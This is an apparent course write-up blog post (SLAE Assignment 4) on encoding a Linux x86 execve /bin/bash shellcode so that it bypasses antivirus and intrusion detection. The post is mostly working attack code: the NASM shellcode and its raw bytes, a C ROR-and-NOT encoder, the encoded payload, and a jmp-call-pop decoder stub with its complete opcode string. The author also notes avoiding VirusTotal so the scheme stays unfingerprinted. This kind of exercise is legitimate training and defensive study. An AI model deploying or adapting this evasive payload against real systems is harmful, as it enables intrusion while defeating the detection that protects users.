<!DOCTYPE html>
<html lang="en-us">

  <head>
  <link href="http://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

  <title>
    
      SLAE Assignment 4 - Encoding/Decoding Shellcode &middot; Lanyon
    
  </title>

  
  <link rel="canonical" href="http://localhost:4000/certification/2017/04/23/encoding-decoding-shellcode/">
  

  <link rel="stylesheet" href="http://localhost:4000/public/css/poole.css">
  <link rel="stylesheet" href="http://localhost:4000/public/css/syntax.css">
  <link rel="stylesheet" href="http://localhost:4000/public/css/lanyon.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=PT+Serif:400,400italic,700%7CPT+Sans:400">

  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://localhost:4000/public/apple-touch-icon-precomposed.png">
  <link rel="shortcut icon" href="http://localhost:4000/public/favicon.ico">

  <link rel="alternate" type="application/rss+xml" title="RSS" href="http://localhost:4000/atom.xml">

  
</head>


  <body>

    <!-- Target for toggling the sidebar `.sidebar-checkbox` is for regular
     styles, `#sidebar-checkbox` for behavior. -->
<input type="checkbox" class="sidebar-checkbox" id="sidebar-checkbox" checked>

<!-- Toggleable sidebar -->
<div class="sidebar" id="sidebar">
  <div class="sidebar-item">
    <p>A reserved <a href="https://jekyllrb.com" target="_blank">Jekyll</a> theme that places the utmost gravity on content with a hidden drawer. Made by <a href="https://twitter.com/mdo" target="_blank">@mdo</a>.</p>
  </div>

  <nav class="sidebar-nav">
    <a class="sidebar-nav-item" href="http://localhost:4000/">Home</a>

    

    
    
      
        
      
    
      
        
      
    
      
        
          <a class="sidebar-nav-item" href="http://localhost:4000/about/">About</a>
        
      
    
      
    
      
    
      
        
      
    
      
        
      
    
      
        
      
    
      
        
      
    
      
        
      
    

    <a class="sidebar-nav-item" href="/archive/v1.1.0.zip">Download</a>
    <a class="sidebar-nav-item" href="">GitHub project</a>
    <span class="sidebar-nav-item">Currently v1.1.0</span>
  </nav>

  <div class="sidebar-item">
    <p>
      &copy; 2020. All rights reserved.
    </p>
  </div>
</div>


    <!-- Wrap is the content to shift when toggling the sidebar. We wrap the
         content to avoid any CSS collisions with our real content. -->
    <div class="wrap">
      <div class="masthead">
        <div class="container">
          <h3 class="masthead-title">
            <a href="/" title="Home">Lanyon</a>
            <small>A Jekyll theme</small>
          </h3>
        </div>
      </div>

      <div class="container content">
        <div class="post">
  <h1 class="post-title">SLAE Assignment 4 - Encoding/Decoding Shellcode</h1>
  <span class="post-date">23 Apr 2017</span>
  <p><br />
Student <strong>SLAE - 891</strong><br />
Github: <a href="https://github.com/phackt/slae">https://github.com/phackt/slae</a><br />
<a href="http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/">http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/</a></p>

<h2 id="assignment-4">Assignment 4:</h2>

<p>Code is available on my <a href="https://github.com/phackt/slae/tree/master/assignment4">github repo</a>.</p>

<p><strong>Our Goal:</strong></p>
<blockquote>
  <p><em>Create a custom encoding scheme</em></p>
  <ul>
    <li><em>POC with using the execve-stack as the shellcode</em></li>
  </ul>
</blockquote>

<p>Hello everybody,</p>

<p>Today we will create an encoded shellcode and its decoding routine.  Encoding a shellcode is useful to bypass Antivirus or Intrusion Detection Systems. Our resulting shellcode and its opcodes will have no meaning at all if the encoding scheme if robust enough (for example avoid classic XOR encoding).</p>

<p>For each byte, our encoding scheme will consists in:</p>
<ul>
  <li>Rolling four bits to the right (ROR instruction)</li>
  <li>Getting the complement of that byte (NOT)</li>
</ul>

<p>We will apply this encoding scheme on the following execve <strong>/bin/bash</strong> stack shellcode:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">global</span> <span class="nv">_start</span>			

<span class="nf">section</span> <span class="nv">.text</span>
<span class="nl">_start:</span>

	<span class="c1">; PUSH the first null dword </span>
	<span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span>
	<span class="nf">push</span> <span class="nb">eax</span>

	<span class="c1">; PUSH ////bin/bash (12) </span>

	<span class="nf">push</span> <span class="mh">0x68736162</span>
	<span class="nf">push</span> <span class="mh">0x2f6e6962</span>
	<span class="nf">push</span> <span class="mh">0x2f2f2f2f</span>

	<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="nb">esp</span>

	<span class="nf">push</span> <span class="nb">eax</span>
	<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">esp</span>

	<span class="nf">push</span> <span class="nb">ebx</span>
	<span class="nf">mov</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">esp</span>

	<span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">11</span>
	<span class="nf">int</span> <span class="mh">0x80</span>
</code></pre></div></div>

<p>Testing the execve stack shellcode provides a /bin/bash prompt indeed:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># gcc -fno-stack-protector -z execstack -o shellcode shellcode.c  &amp;&amp; ./shellcode</span>
Shellcode Length:  30
root@kali:/root/Documents/pentest/certs/slae/exam/assignment4# <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
</code></pre></div></div>

<p>Execve stack shellcode looks like:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="se">\x</span>31<span class="se">\x</span>c0<span class="se">\x</span>50<span class="se">\x</span>68<span class="se">\x</span>2f<span class="se">\x</span>2f<span class="se">\x</span>6c<span class="se">\x</span>73<span class="se">\x</span>68<span class="se">\x</span>2f<span class="se">\x</span>62<span class="se">\x</span>69<span class="se">\x</span>6e<span class="se">\x</span>89<span class="se">\x</span>e3<span class="se">\x</span>50<span class="se">\x</span>89<span class="se">\x</span>e2<span class="se">\x</span>53<span class="se">\x</span>89<span class="se">\x</span>e1<span class="se">\x</span>b0<span class="se">\x</span>0b<span class="se">\x</span><span class="nb">cd</span><span class="se">\x</span>80
</code></pre></div></div>

<p>Let’s now create our encoding routine (<a href="https://github.com/phackt/slae/tree/master/assignment4/shellcode_encode.c">shellcode_encode.c</a>):</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
</span>
<span class="c1">// execve stack shellcode</span>
<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">shellcode</span><span class="p">[]</span> <span class="o">=</span> \
<span class="s">"</span><span class="se">\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80</span><span class="s">"</span><span class="p">;</span>

<span class="c1">// print shellcode</span>
<span class="kt">void</span> <span class="nf">print_shellcode</span><span class="p">(){</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"Length %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="k">sizeof</span><span class="p">(</span><span class="n">shellcode</span><span class="p">));</span>
	<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">);</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\\</span><span class="s">x%02x"</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
	<span class="p">}</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">);</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"0x%02x,"</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
	<span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>

	<span class="kt">int</span>	<span class="n">rotate</span> <span class="o">=</span> <span class="mi">4</span><span class="p">;</span>	<span class="c1">// rotate 4 bits to the right</span>

	<span class="c1">// print initial shellcode</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"Initial shellcode</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">print_shellcode</span><span class="p">();</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">);</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&gt;&gt;</span> <span class="n">rotate</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;&lt;</span> <span class="p">(</span><span class="mi">8</span><span class="o">-</span><span class="n">rotate</span><span class="p">));</span>	<span class="c1">// ror method</span>
		<span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="o">~</span><span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">];</span> <span class="c1">// one's complement </span>
	<span class="p">}</span>

	<span class="c1">// print encoded shellcode</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Encoded shellcode</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">print_shellcode</span><span class="p">();</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"0xaa"</span><span class="p">);</span> <span class="c1">// marker for the end of encoded shellcode</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

<span class="p">}</span>
</code></pre></div></div>

<p>The encoded execve stack shellcode is the following:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0xec,0xf3,0xfa,0x79,0xd9,0xe9,0xc8,0x79,0x79,0xd9,0x69,0x19,0x0d,0x79,0x0d,0x0d,0x0d,0x0d,0x67,0xc1,0xfa,0x67,0xd1,0xca,0x67,0xe1,0xf4,0x4f,0x23,0xf7,0xaa
</code></pre></div></div>

<p>Let’s create the decoding nasm shellcode <a href="https://github.com/phackt/slae/tree/master/assignment4/shellcode_decoder.nasm">shellcode_decoder.nasm</a>:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">global</span> <span class="nv">_start</span>			

<span class="nf">section</span> <span class="nv">.text</span>
<span class="nl">_start:</span>

	<span class="nf">jmp</span> <span class="nv">short</span> <span class="nv">call_shellcode</span>    <span class="c1">; jmp, call, pop technique</span>

<span class="nl">decoder:</span>
	<span class="nf">pop</span> <span class="nb">esi</span>

<span class="nl">decode:</span> 
	<span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span>
	<span class="nf">xor</span> <span class="nb">ebx</span><span class="p">,</span> <span class="nb">ebx</span>
	<span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">esi</span><span class="p">]</span>          <span class="c1">; we move the byte to be decoded</span>
	<span class="nf">not</span> <span class="nb">al</span>                      <span class="c1">; one's complement</span>
	<span class="nf">rol</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">4</span>                   <span class="c1">; rolling on left to decode the rolling on right encoding</span>
	<span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">esi</span><span class="p">],</span> <span class="nb">al</span>          <span class="c1">; saving the decoded byte</span>

	<span class="nf">lea</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span>          <span class="c1">; next byte   </span>
	<span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span><span class="p">]</span>  
	<span class="nf">cmp</span> <span class="nb">bl</span><span class="p">,</span> <span class="mh">0xaa</span>                <span class="c1">; looking for the end of encoded shellcode</span>
	<span class="nf">je</span> <span class="nv">short</span> <span class="nv">EncodedShellcode</span>   <span class="c1">; we jump to the decoded shellcode</span>
	<span class="nf">jmp</span> <span class="nv">short</span> <span class="nv">decode</span>            <span class="c1">; keeping on decoding</span>

<span class="nl">call_shellcode:</span>

	<span class="nf">call</span> <span class="nv">decoder</span>
	<span class="nl">EncodedShellcode:</span> <span class="kd">db</span> <span class="mh">0xec</span><span class="p">,</span><span class="mh">0xf3</span><span class="p">,</span><span class="mh">0xfa</span><span class="p">,</span><span class="mh">0x79</span><span class="p">,</span><span class="mh">0xd9</span><span class="p">,</span><span class="mh">0xe9</span><span class="p">,</span><span class="mh">0xc8</span><span class="p">,</span><span class="mh">0x79</span><span class="p">,</span><span class="mh">0x79</span><span class="p">,</span><span class="mh">0xd9</span><span class="p">,</span><span class="mh">0x69</span><span class="p">,</span><span class="mh">0x19</span><span class="p">,</span><span class="mh">0x0d</span><span class="p">,</span><span class="mh">0x79</span><span class="p">,</span><span class="mh">0x0d</span><span class="p">,</span><span class="mh">0x0d</span><span class="p">,</span><span class="mh">0x0d</span><span class="p">,</span><span class="mh">0x0d</span><span class="p">,</span><span class="mh">0x67</span><span class="p">,</span><span class="mh">0xc1</span><span class="p">,</span><span class="mh">0xfa</span><span class="p">,</span><span class="mh">0x67</span><span class="p">,</span><span class="mh">0xd1</span><span class="p">,</span><span class="mh">0xca</span><span class="p">,</span><span class="mh">0x67</span><span class="p">,</span><span class="mh">0xe1</span><span class="p">,</span><span class="mh">0xf4</span><span class="p">,</span><span class="mh">0x4f</span><span class="p">,</span><span class="mh">0x23</span><span class="p">,</span><span class="mh">0xf7</span><span class="p">,</span><span class="mh">0xaa</span>
</code></pre></div></div>

<p>Let’s assembly, link and get the decoding shellcode:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ./compile.sh shellcode_decoder</span>
<span class="o">[</span>+] Assembling with Nasm ... 
<span class="o">[</span>+] Linking ...
<span class="o">[</span>+] Done!
<span class="c"># objdump -d ./shellcode_decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">1a</span><span class="se">\x</span><span class="s2">5e</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">db</span><span class="se">\x</span><span class="s2">8a</span><span class="se">\x</span><span class="s2">06</span><span class="se">\x</span><span class="s2">f6</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">88</span><span class="se">\x</span><span class="s2">06</span><span class="se">\x</span><span class="s2">8d</span><span class="se">\x</span><span class="s2">76</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">8a</span><span class="se">\x</span><span class="s2">1e</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">fb</span><span class="se">\x</span><span class="s2">aa</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">07</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">e7</span><span class="se">\x</span><span class="s2">e8</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ec</span><span class="se">\x</span><span class="s2">f3</span><span class="se">\x</span><span class="s2">fa</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">d9</span><span class="se">\x</span><span class="s2">e9</span><span class="se">\x</span><span class="s2">c8</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">d9</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">19</span><span class="se">\x</span><span class="s2">0d</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">0d</span><span class="se">\x</span><span class="s2">0d</span><span class="se">\x</span><span class="s2">0d</span><span class="se">\x</span><span class="s2">0d</span><span class="se">\x</span><span class="s2">67</span><span class="se">\x</span><span class="s2">c1</span><span class="se">\x</span><span class="s2">fa</span><span class="se">\x</span><span class="s2">67</span><span class="se">\x</span><span class="s2">d1</span><span class="se">\x</span><span class="s2">ca</span><span class="se">\x</span><span class="s2">67</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">4f</span><span class="se">\x</span><span class="s2">23</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">aa"</span>
</code></pre></div></div>

<p>Let’s update the <a href="https://github.com/phackt/slae/tree/master/assignment4/shellcode.c">shellcode.c</a> file and execute our decoding shellcode:<br />
<img src="http://localhost:4000/public/images/slae/assignment4/image1.png" alt="image1" /></p>

<p>Remember that running our shellcode thanks to shellcode.c is useful because our shellcode will be located into the writable .data segment.<br />
If we directly execute the shellcode_decoder executable, it will result in a segmentation fault because it will try to rewrite the EncodedShellcode variable located in the non writable .text segment (also useful to use the jmp/call/pop technique in order to avoid null bytes and to dynamically get the address of our encoded shellcode).</p>

<p>We did not test it on <a href="https://www.virustotal.com/">VirusTotal</a> in order to avoid the fingerprinting of the encoding scheme.</p>

<p>Hope you enjoyed this post, don’t hesitate to comment and share.</p>

<p><a href="https://twitter.com/phackt_ul">Phackt</a></p>

</div>


<div class="related">
  <h2>Related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/dev/2020/05/27/git-secrets-exposed/">
            What solutions to prevent git leaks ?
            <small>27 May 2020</small>
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/web/2018/08/05/web-exposed-git-repositories/">
            Gathering some information from web exposed git repositories
            <small>05 Aug 2018</small>
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/web/2017/12/24/play-with-permissive-cors/">
            Play with permissive CORS
            <small>24 Dec 2017</small>
          </a>
        </h3>
      </li>
    
  </ul>
</div>


      </div>
    </div>


    <!-- <label for="sidebar-checkbox" class="sidebar-toggle"></label> -->

    <script src='/public/js/script.js'></script>
 
  </body>
</html>
